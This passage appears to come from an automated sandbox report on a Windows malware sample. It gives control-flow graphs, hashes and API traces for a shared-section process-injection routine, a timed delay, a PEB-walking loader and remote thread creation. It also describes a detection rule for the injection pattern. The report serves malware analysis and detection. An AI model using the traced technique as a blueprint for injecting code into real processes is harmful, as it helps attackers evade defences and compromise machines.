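Run stand-alone it reports refs 401693, 4016f2, 401723 and 401745 for the injection pattern and 620e19 (mode 0x400, undocumented bits) for the error-mode probe. The injection check deliberately requires all three pieces (RWX section, local writable view, foreign executable view); a loader that only maps a read/write section into a child, as the first section here does, is not flagged on its own, which keeps the rule from firing on ordinary shared-memory use.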

                                                        Control-flow Graph (rendered figure; executed/not-executed colouring not reproduced)
                                                        • Blocks of sub_401919: 401919-40191a → either 40191d-401956 (call 401207) or 401969-4019c5 (call 401207, Sleep, call 401482) → 4019c7-4019cf call 401583 → 4019d4-401a19 → 401a0f-401a15 → 401a1c-401a25 call 401207.
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                          dwMilliseconds 00001388 = 5000 ms; 000000FA is the next stack slot, not a parameter. The delay sits directly before the call to the section-mapping routine 00401583 (block 4019c7-4019cf).
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862464987.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_kGSZ4dCqYh.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 2b935ac753e934015516d799e1095bac90694ea099bafde975148c207ca850c9
                                                        • Instruction ID: 49835af623e861a6f2ddbc0bf662c5c40176c384461ea98b099af7f339eb22c4
                                                        • Opcode Fuzzy Hash: 2b935ac753e934015516d799e1095bac90694ea099bafde975148c207ca850c9
                                                        • Instruction Fuzzy Hash: 7911DCB234C201EBD6009A84A862E7A3214AB51359F304537FA57B90F2D57D9A13F76F

                                                        Control-flow Graph (rendered figure; executed/not-executed colouring not reproduced)
                                                        • Blocks of sub_401959: 401959-4019c5 (call 401207, Sleep, call 401482) → 4019c7-4019cf call 401583 → 4019d4-401a19 → 401a0f-401a15 → 401a1c-401a25 call 401207.
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                          • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                          • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                          • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862464987.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_kGSZ4dCqYh.jbxd
                                                        Similarity
                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                        • String ID:
                                                        • API String ID: 1885482327-0
                                                        • Opcode ID: 973fe8c7f692c8164376a233d22da1c8e21a759768f578ec8ae17a8f290018c7
                                                        • Instruction ID: 220a72f44c34cad911d214d6bf830d158092726683e2111099ccb198781fee4b
                                                        • Opcode Fuzzy Hash: 973fe8c7f692c8164376a233d22da1c8e21a759768f578ec8ae17a8f290018c7
                                                        • Instruction Fuzzy Hash: 1311BCB1648204FADA009A849C62E7A3228AB41754F204137BA47B90F1C57DA913EAAF

                                                        Control-flow Graph (rendered figure; executed/not-executed colouring not reproduced)
                                                        • Same wrapper entered at 401970: 401970-4019c5 (call 401207, Sleep, call 401482) → 4019c7-4019cf call 401583 → 4019d4-401a19 → 401a0f-401a15 → 401a1c-401a25 call 401207.
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                          • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                          • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                          • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862464987.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_kGSZ4dCqYh.jbxd
                                                        Similarity
                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                        • String ID:
                                                        • API String ID: 1885482327-0
                                                        • Opcode ID: b0ddfabd172ae9c3cb26196b0cb86bb5accc73c170931bda3ffef6ca5bc85053
                                                        • Instruction ID: edf3ac2f4a0a3dadc82130375ffc9a201d65d5ca35b25829e414e95522c05f9b
                                                        • Opcode Fuzzy Hash: b0ddfabd172ae9c3cb26196b0cb86bb5accc73c170931bda3ffef6ca5bc85053
                                                        • Instruction Fuzzy Hash: AA01C0B174C104EBDB009A84DC62E7A3214AF41704F204537BA57B91F1C53EAA23FB5B

                                                        Control-flow Graph (rendered figure; executed/not-executed colouring not reproduced)
                                                        • Same wrapper entered at 401977: 401977-4019c5 (call 401207, Sleep, call 401482) → 4019c7-4019cf call 401583 → 4019d4-401a19 → 401a0f-401a15 → 401a1c-401a25 call 401207.
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                          • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                          • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                          • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862464987.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_kGSZ4dCqYh.jbxd
                                                        Similarity
                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                        • String ID:
                                                        • API String ID: 1885482327-0
                                                        • Opcode ID: 547ce1ee7459762dd25db0cd36bc5e4baa4f04934683c573935985333de64e11
                                                        • Instruction ID: c889a794982209429869940d23560ef391d683eb1520a1ae8baa03dfc3eb9000
                                                        • Opcode Fuzzy Hash: 547ce1ee7459762dd25db0cd36bc5e4baa4f04934683c573935985333de64e11
                                                        • Instruction Fuzzy Hash: E601E1B1308100EBD7009B849C51ABA3614AF41314F20413BB957790E2C53EAA22EB5B

                                                        Control-flow Graph (rendered figure; executed/not-executed colouring not reproduced)
                                                        • Same wrapper entered at 401987: 401987-4019c5 (call 401207, Sleep, call 401482) → 4019c7-4019cf call 401583 → 4019d4-401a19 → 401a0f-401a15 → 401a1c-401a25 call 401207.
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                          • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                          • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                          • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862464987.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_kGSZ4dCqYh.jbxd
                                                        Similarity
                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                        • String ID:
                                                        • API String ID: 1885482327-0
                                                        • Opcode ID: 48afa338b6eb4ead81a9d6383d5bdcf6d33ddda25fb9a1f4e9ca7df9d9b0c8b0
                                                        • Instruction ID: 1aa0efa7bda459d32f82bf33ce90feabc7a2b43109eca8adeaaf204144b81d62
                                                        • Opcode Fuzzy Hash: 48afa338b6eb4ead81a9d6383d5bdcf6d33ddda25fb9a1f4e9ca7df9d9b0c8b0
                                                        • Instruction Fuzzy Hash: C201C0B1708104EBDB009A84DC62E7A3214AF41714F204137BA57791F1C53EAA23FB5B

                                                        Control-flow Graph

                                                        control_flow_graph 388 40198a-40199d 389 4019a8-4019c5 Sleep call 401482 388->389 390 4019a2 call 401207 388->390 393 4019d4-401a19 389->393 394 4019c7-4019cf call 401583 389->394 390->389 404 401a1c-401a25 call 401207 393->404 405 401a0f-401a15 393->405 394->393 405->404
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                          • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                          • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                          • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862464987.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_kGSZ4dCqYh.jbxd
                                                        Similarity
                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                        • String ID:
                                                        • API String ID: 1885482327-0
                                                        • Opcode ID: 66f4d7de36bf33a8276767325b567db769fa807301e16b4e03cd2b1c881b4aa0
                                                        • Instruction ID: 93e9f4b763319a312fe66b3304ba82e0c9e14e36225fd67d869cb8e68c59c211
                                                        • Opcode Fuzzy Hash: 66f4d7de36bf33a8276767325b567db769fa807301e16b4e03cd2b1c881b4aa0
                                                        • Instruction Fuzzy Hash: 5501B572308244EBDB019F90DC92EAE3728AF45318F24017BB557790E2C53DA912EB1B

                                                        Control-flow Graph

                                                        control_flow_graph 408 601696-6016d0 call 6019a9 411 6016d2-601705 VirtualAlloc call 601723 408->411 412 60171e 408->412 414 60170a-60171c 411->414 412->412 414->412
                                                        APIs
                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006016E7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862925311.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5f0000_kGSZ4dCqYh.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                        • Instruction ID: b9abbc90aa05ea29814438a8c338ac5a84343a202bced34a37e35c4b1e36a204
                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                        • Instruction Fuzzy Hash: E3113C79A40208EFDB01DF98C985E99BBF5AF08350F058094F9489B362D771EA50DF80
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862957209.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_620000_kGSZ4dCqYh.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .$GetProcAddress.$l
                                                        • API String ID: 0-2784972518
                                                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                        • Instruction ID: 2ba7ce5c814ab9565d4597d47c006d941323b89efae0f9c485d6973fd74c974a
                                                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                        • Instruction Fuzzy Hash: BF3138B6901619DFEB10CF99D880AEDBBF6FF48324F14504AD441A7312D771AA85CFA4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862464987.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_kGSZ4dCqYh.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: #X%
                                                        • API String ID: 0-730838689
                                                        • Opcode ID: 245b7a6330694b5c367d3b257ccbe4366a0bf95add0a101e660e11a0368d02b9
                                                        • Instruction ID: 71e09992ebba1ebce1a14e5228dc5e73fa07ad40964d1ad344f7d49068a62d69
                                                        • Opcode Fuzzy Hash: 245b7a6330694b5c367d3b257ccbe4366a0bf95add0a101e660e11a0368d02b9
                                                        • Instruction Fuzzy Hash: 2441DC352485539DC30299188E899EABF79FDC7398B10017ED8C2AB9D3CBA02517D3B6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862464987.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_kGSZ4dCqYh.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 24dfe36045d0991ac749a0892ad312c9a4e30bcc45954bcab72f1b8cf2b0dd63
                                                        • Instruction ID: 18334b27c1f95b13a70b5794667acb6e5ebe9408c321dbf9d60f89b0be35e569
                                                        • Opcode Fuzzy Hash: 24dfe36045d0991ac749a0892ad312c9a4e30bcc45954bcab72f1b8cf2b0dd63
                                                        • Instruction Fuzzy Hash: AA51AE612492109FE71989358C829B637219F43726F2C327FE98267EE6D379D4438A4A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862925311.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5f0000_kGSZ4dCqYh.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                        • Instruction ID: b95ee2f3405d58ffd56745f0012b1804cb726cbe13f6560bba5720daa0619b56
                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                        • Instruction Fuzzy Hash: 7C1170723801009FD748DF55DC81FA773EAEB89320B298069ED04CB755D675E842C760
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862957209.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_620000_kGSZ4dCqYh.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                        • Instruction ID: 24baee486935e57d3a0b741057cb9f05ffc7e32a8ab280632829428391162b7e
                                                        • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                        • Instruction Fuzzy Hash: 0301F776601A108FEF21CF60E804BEA33F7EF85305F0548E4D90697342E770A8418F80

                                                        Execution Graph

                                                        Execution Coverage:8.9%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:108
                                                        Total number of Limit Nodes:2
                                                        execution_graph 2804 55003c 2805 550049 2804->2805 2817 550e0f SetErrorMode SetErrorMode 2805->2817 2810 550265 2811 5502ce VirtualProtect 2810->2811 2813 55030b 2811->2813 2812 550439 VirtualFree 2816 5504be LoadLibraryA 2812->2816 2813->2812 2815 5508c7 2816->2815 2818 550223 2817->2818 2819 550d90 2818->2819 2820 550dad 2819->2820 2821 550dbb GetPEB 2820->2821 2822 550238 VirtualAlloc 2820->2822 2821->2822 2822->2810 2898 40198a 2899 4019a8 Sleep 2898->2899 2900 401207 2898->2900 2901 4019c3 2899->2901 2900->2899 2902 401583 7 API calls 2901->2902 2903 4019d4 2901->2903 2902->2903 2904 40158e 2905 4015bf 2904->2905 2906 401634 NtDuplicateObject 2905->2906 2915 401750 2905->2915 2907 401651 NtCreateSection 2906->2907 2906->2915 2908 4016d1 NtCreateSection 2907->2908 2909 401677 NtMapViewOfSection 2907->2909 2910 4016fd 2908->2910 2908->2915 2909->2908 2911 40169a NtMapViewOfSection 2909->2911 2912 401707 NtMapViewOfSection 2910->2912 2910->2915 2911->2908 2913 4016b8 2911->2913 2914 40172e NtMapViewOfSection 2912->2914 2912->2915 2913->2908 2914->2915 2823 402e50 2825 402e54 2823->2825 2824 401959 8 API calls 2826 402fa8 2824->2826 2825->2824 2825->2826 2831 550005 2836 55092b GetPEB 2831->2836 2833 550030 2838 55003c 2833->2838 2837 550972 2836->2837 2837->2833 2839 550049 2838->2839 2840 550e0f 2 API calls 2839->2840 2841 550223 2840->2841 2842 550d90 GetPEB 2841->2842 2843 550238 VirtualAlloc 2842->2843 2844 550265 2843->2844 2845 5502ce VirtualProtect 2844->2845 2847 55030b 2845->2847 2846 550439 VirtualFree 2850 5504be LoadLibraryA 2846->2850 2847->2846 2849 5508c7 2850->2849 2873 401970 2874 401975 2873->2874 2875 4019a8 Sleep 2874->2875 2876 4019c3 2875->2876 2877 401583 7 API calls 2876->2877 2878 4019d4 2876->2878 2877->2878 2760 403054 2761 403197 2760->2761 2762 40307e 2760->2762 2762->2761 2763 403139 RtlCreateUserThread NtTerminateProcess 2762->2763 2763->2761 2851 550001 2852 550005 2851->2852 
2853 55092b GetPEB 2852->2853 2854 550030 2853->2854 2855 55003c 7 API calls 2854->2855 2856 550038 2855->2856 2764 531226 2767 531237 2764->2767 2768 531246 2767->2768 2771 5319d7 2768->2771 2772 5319f2 2771->2772 2773 5319fb CreateToolhelp32Snapshot 2772->2773 2774 531a17 Module32First 2772->2774 2773->2772 2773->2774 2775 531a26 2774->2775 2776 531236 2774->2776 2778 531696 2775->2778 2779 5316c1 2778->2779 2780 5316d2 VirtualAlloc 2779->2780 2781 53170a 2779->2781 2780->2781 2781->2781 2782 402f17 2783 402f1c 2782->2783 2785 402fa8 2783->2785 2786 401959 2783->2786 2787 401968 2786->2787 2788 4019a8 Sleep 2787->2788 2789 4019c3 2788->2789 2791 4019d4 2789->2791 2792 401583 2789->2792 2791->2785 2793 401594 2792->2793 2794 401634 NtDuplicateObject 2793->2794 2803 401750 2793->2803 2795 401651 NtCreateSection 2794->2795 2794->2803 2796 4016d1 NtCreateSection 2795->2796 2797 401677 NtMapViewOfSection 2795->2797 2798 4016fd 2796->2798 2796->2803 2797->2796 2799 40169a NtMapViewOfSection 2797->2799 2800 401707 NtMapViewOfSection 2798->2800 2798->2803 2799->2796 2801 4016b8 2799->2801 2802 40172e NtMapViewOfSection 2800->2802 2800->2803 2801->2796 2802->2803 2803->2791 2885 401919 2886 401969 2885->2886 2887 40191d 2885->2887 2888 4019a8 Sleep 2886->2888 2889 4019c3 2888->2889 2890 401583 7 API calls 2889->2890 2891 4019d4 2889->2891 2890->2891

                                                        Control-flow Graph

                                                        control_flow_graph 85 401583-4015de call 401207 97 4015e0 85->97 98 4015e3-4015e8 85->98 97->98 100 401909-401911 98->100 101 4015ee-4015ff 98->101 100->98 106 401916-401956 call 401207 100->106 104 401605-40162e 101->104 105 401907 101->105 104->105 113 401634-40164b NtDuplicateObject 104->113 105->106 113->105 115 401651-401675 NtCreateSection 113->115 117 4016d1-4016f7 NtCreateSection 115->117 118 401677-401698 NtMapViewOfSection 115->118 117->105 121 4016fd-401701 117->121 118->117 122 40169a-4016b6 NtMapViewOfSection 118->122 121->105 123 401707-401728 NtMapViewOfSection 121->123 122->117 124 4016b8-4016ce 122->124 123->105 127 40172e-40174a NtMapViewOfSection 123->127 124->117 127->105 130 401750 127->130 130->105 131 401750 call 401755 130->131 131->105
                                                        APIs
                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2090213595.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: Section$View$Create$DuplicateObject
                                                        • String ID:
                                                        • API String ID: 1546783058-0
                                                        • Opcode ID: d8025aa2a73fa1757bf9d96cb7b1acd78e4ac8c64498884b03c6ab91ddf532bc
                                                        • Instruction ID: f2d5e20ae79a609852431105b0704d648b73f45673a5aa535929140ce5e9a1ec
                                                        • Opcode Fuzzy Hash: d8025aa2a73fa1757bf9d96cb7b1acd78e4ac8c64498884b03c6ab91ddf532bc
                                                        • Instruction Fuzzy Hash: 42614DB0900209FFEB218F91CC48FAF7BB8EF85710F10012AF952BA1E5D6749941DB25

                                                        Control-flow Graph

                                                        control_flow_graph 132 40158e-4015b6 133 4015c8 132->133 134 4015bf-4015de call 401207 132->134 133->134 138 4015e0 134->138 139 4015e3-4015e8 134->139 138->139 141 401909-401911 139->141 142 4015ee-4015ff 139->142 141->139 147 401916-401956 call 401207 141->147 145 401605-40162e 142->145 146 401907 142->146 145->146 154 401634-40164b NtDuplicateObject 145->154 146->147 154->146 156 401651-401675 NtCreateSection 154->156 158 4016d1-4016f7 NtCreateSection 156->158 159 401677-401698 NtMapViewOfSection 156->159 158->146 162 4016fd-401701 158->162 159->158 163 40169a-4016b6 NtMapViewOfSection 159->163 162->146 164 401707-401728 NtMapViewOfSection 162->164 163->158 165 4016b8-4016ce 163->165 164->146 168 40172e-40174a NtMapViewOfSection 164->168 165->158 168->146 171 401750 168->171 171->146 172 401750 call 401755 171->172 172->146
                                                        APIs
                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2090213595.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: Section$View$Create$DuplicateObject
                                                        • String ID:
                                                        • API String ID: 1546783058-0
                                                        • Opcode ID: b0195c2069dc6e331d8d87e09b392f04d65fbe6eaf74cb5c44d370e3a2e163ea
                                                        • Instruction ID: 0dfbee2a1f0830b6acdc9e972913786be015a59f94024eee438c43ca1dd55f4f
                                                        • Opcode Fuzzy Hash: b0195c2069dc6e331d8d87e09b392f04d65fbe6eaf74cb5c44d370e3a2e163ea
                                                        • Instruction Fuzzy Hash: BA5139B1900249BFEF218F91CC49FEBBFB8EF86714F140159F951AA2A5D670A941CB24

                                                        Control-flow Graph

                                                        control_flow_graph 173 4015bc-4015c5 174 4015d0-4015de 173->174 175 4015ca call 401207 173->175 176 4015e0 174->176 177 4015e3-4015e8 174->177 175->174 176->177 179 401909-401911 177->179 180 4015ee-4015ff 177->180 179->177 185 401916-401956 call 401207 179->185 183 401605-40162e 180->183 184 401907 180->184 183->184 192 401634-40164b NtDuplicateObject 183->192 184->185 192->184 194 401651-401675 NtCreateSection 192->194 196 4016d1-4016f7 NtCreateSection 194->196 197 401677-401698 NtMapViewOfSection 194->197 196->184 200 4016fd-401701 196->200 197->196 201 40169a-4016b6 NtMapViewOfSection 197->201 200->184 202 401707-401728 NtMapViewOfSection 200->202 201->196 203 4016b8-4016ce 201->203 202->184 206 40172e-40174a NtMapViewOfSection 202->206 203->196 206->184 209 401750 206->209 209->184 210 401750 call 401755 209->210 210->184
                                                        APIs
                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2090213595.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: Section$View$Create$DuplicateObject
                                                        • String ID:
                                                        • API String ID: 1546783058-0
                                                        • Opcode ID: cc208e499be32a7b8d2e1b8f44698ba7bae8291931bb2c7a737ae2018edfaae9
                                                        • Instruction ID: 9e9cfe78a9b9fcbe8a20f4c56589f3f995e8910032e3214eb5438fd9bfe06916
                                                        • Opcode Fuzzy Hash: cc208e499be32a7b8d2e1b8f44698ba7bae8291931bb2c7a737ae2018edfaae9
                                                        • Instruction Fuzzy Hash: 855129B1900249BFEF218F91CC48FAFBBB8EF86B15F100159F951AA2A5D7709940CB20

                                                        Control-flow Graph

                                                        control_flow_graph 211 403054-403078 212 403197-40319c 211->212 213 40307e-403096 211->213 213->212 214 40309c-4030ad 213->214 215 4030af-4030b8 214->215 216 4030bd-4030cb 215->216 216->216 217 4030cd-4030d4 216->217 218 4030f6-4030fd 217->218 219 4030d6-4030f5 217->219 220 40311f-403122 218->220 221 4030ff-40311e 218->221 219->218 222 403124-403127 220->222 223 40312b 220->223 221->220 222->223 224 403129 222->224 223->215 225 40312d-403132 223->225 224->225 225->212 226 403134-403137 225->226 226->212 227 403139-403194 RtlCreateUserThread NtTerminateProcess 226->227 227->212
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2090213595.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: CreateProcessTerminateThreadUser
                                                        • String ID:
                                                        • API String ID: 1921587553-0
                                                        • Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                        • Instruction ID: bb3d83799e525a3431e0f051c565fd2002d42970a2b52bf5f395df3a052ac564
                                                        • Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                        • Instruction Fuzzy Hash: 9F412732618E0C4FD768EE6CA84966377D5E798311F1A43ABD809D7389EE30D85187C5

                                                        Control-flow Graph

